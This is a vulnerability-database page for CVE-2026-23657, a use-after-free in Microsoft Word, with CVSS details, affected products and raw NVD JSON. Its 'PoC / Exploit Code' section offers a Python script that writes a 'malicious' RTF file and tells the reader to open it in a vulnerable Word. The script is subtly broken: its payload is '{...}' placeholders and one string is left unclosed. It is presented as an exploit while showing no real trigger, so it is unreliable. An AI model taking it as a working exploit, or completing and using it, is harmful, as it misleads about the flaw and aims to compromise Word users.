Security Vulnerability Report
中文
CVE-2026-23657 CVSS 7.8 HIGH

CVE-2026-23657

Published: 2026-04-14 18:16:44
Last Modified: 2026-04-29 19:11:57

Description

Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:* - VULNERABLE
cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:* - VULNERABLE
cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:-:x64:* - VULNERABLE
cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:-:x86:* - VULNERABLE
Microsoft Office Word (具体受影响版本需参考微软官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Generator for CVE-2026-23657 (Conceptual) # This script demonstrates how to create a malformed document structure that may trigger the UAF. # For educational and defensive testing purposes only. def create_malicious_doc(): # RTF Header header = r"{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033\viewkind4\uc1\pard\f0\fs20" # Malicious payload structure attempting to trigger the memory corruption # Typically involves malformed OLE objects or specific RTF control words exploit_body = r"{\field{\*\fldinst{HYPERLINK \\l \"{\\object\\objclass{...}\\objdata{...}}\"}}{\fldrslt{Click Me}}} footer = r"\par}" return header + exploit_body + footer if __name__ == "__main__": poc_data = create_malicious_doc() with open("cve_2026_23657_poc.rtf", "w", encoding="utf-8") as f: f.write(poc_data) print("[+] POC file generated: cve_2026_23657_poc.rtf") print("[!] Open this file in a vulnerable version of Microsoft Word to test.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23657", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:16:44.327", "lastModified": "2026-04-29T19:11:56.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x64:*", "matchCriteriaId": "3259EBFE-AE2D-48B8-BE9A-E22BBDB31378"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:x86:*", "matchCriteriaId": "CD25F492-9272-4836-832C-8439EBE64CCF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:-:x64:*", "matchCriteriaId": "D31E509A-0B2E-4B41-88C4-0099E800AFE6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2024:*:*:*:*:-:x86:*", "matchCriteriaId": "017A7041-BEF1-4E4E-AC8A-EFC6AFEB01FE"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23657", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}